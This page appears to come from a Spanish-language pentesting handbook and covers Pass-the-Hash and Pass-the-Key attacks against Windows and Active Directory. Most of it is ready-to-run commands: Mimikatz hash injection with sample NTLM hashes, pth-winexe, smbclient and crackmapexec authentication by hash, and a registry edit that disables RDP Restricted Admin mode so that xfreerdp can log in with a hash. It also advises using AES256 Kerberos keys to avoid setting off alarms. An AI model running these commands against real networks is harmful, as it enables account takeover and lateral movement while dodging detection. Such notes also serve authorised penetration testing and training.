Pass the X

PASS THE HASH

Los hashes de LM y NT se almacenan en bases de datos locales de Windows SAM y Active Directory NTDS para autenticar a los usuarios locales y de dominio, respectivamente. Estos hashes, tanto LM como NT, tienen una longitud de 16 bytes.

Sin embargo, los hash LM son bastante débiles, por lo que no se utilizan desde Windows Vista / Server 2008. Por otro lado, el hash NT es un poco más fuerte, pero no se usa una sal para calcularlo, por lo que se puede descifrar usando valores precalculados.

Muchas veces, el hash NT se denomina hash NTLM, sin embargo, esto puede resultar confuso, ya que el protocolo NTLM también usa hashes, llamados hash NTLM. Un hash NTLM será un hash del protocolo NTLM.

Muchas herramientas le permiten extraer los hash LM y NT, y normalmente devuelven un resultado con varias líneas, una por usuario, con el formato

<username>:<rid>:<LM>:<NT>:::

En caso de que no se utilice LM, su valor será

aad3b435b51404eeaad3b435b51404ee

(el hash LM de una cadena vacía).

Además, puede intentar descifrar los hash de LM y NT con hashcat para recuperar la contraseña original. Si tiene suerte y el hash LM está presente, esto debería ser rápido.

Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50
264b74508085d82c69794a4d8 /run:powershell.exe"'

Como sistema:

sekurlsa::pth /user:DESKTOP-DGPBRMB$ /domain:internal.layer8prueba.com /ntlm:55dea1652730970a08d19fb8631c3310

Metasploit:

PATH-WINEXE:

pth-winexe -U internal.layer8prueba.com/adminti%aad3b435b51404eeaad3b435b51404ee:9f815de3a83531391a706a844c81df18 //192.168.18.14 cmd.exe

SMBClient

smbclient //192.168.18.14/C$ -U adminti --pw-nt-hash 9f815de3a83531391a706a844c81df18 -W internal.layer8prueba.com

RDP

Primero editar este registro:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Luego proceder a:

xfreerdp /v:192.168.18.14 /u:admin_temp /pth:7b6c87ab06fbdd91b451d8b7a3ca6ea6 /cert-ignore

Crackmapexec:

crackmapexec smb <ip> -d <domain> -u <user> -H <hash>

Domain user:

Local admin:

PASS THE KEY

Aparte de los hashes LM / NT , se almacenan las claves Kerberos, derivadas de la contraseña del usuario y utilizadas en el protocolo de autenticación Kerberos.

Las claves de Kerberos se pueden utilizar para solicitar un vale de Kerberos que represente al usuario en la autenticación de Kerberos. Hay varias claves diferentes, y se utilizan diferentes para diferentes compatibilidad con el cifrado Kerberos:

• Clave AES 256: utilizada por el algoritmo AES256-CTS-HMAC-SHA1-96. Este es el que Kerberos usa comúnmente, y el que debe usar un pentester para evitar disparar alarmas.

• Clave AES 128: utilizada por el algoritmo AES128-CTS-HMAC-SHA1-96.

• Clave DES: utilizada por el algoritmo DES-CBC-MD5 en desuso.

• Clave RC4: este es el hash NT del usuario utilizado por el algoritmo RC4-HMAC.

Estas claves se pueden utilizar en un ataque Pass-The-Key para recuperar un ticket para el usuario suplantado. Luego, puede usar ese vale de Kerberos para autenticarse contra diferentes servicios del dominio en nombre del usuario.

PreviousDefensa y Deteccion NextReutilizacion de Credenciales Locales y de Dominioo

Last updated 2 years ago

hashtagPASS THE HASH

hashtagMimikatz

hashtagMetasploit:

hashtagPATH-WINEXE:

hashtagSMBClient

hashtagRDP

hashtagCrackmapexec:

hashtagPASS THE KEY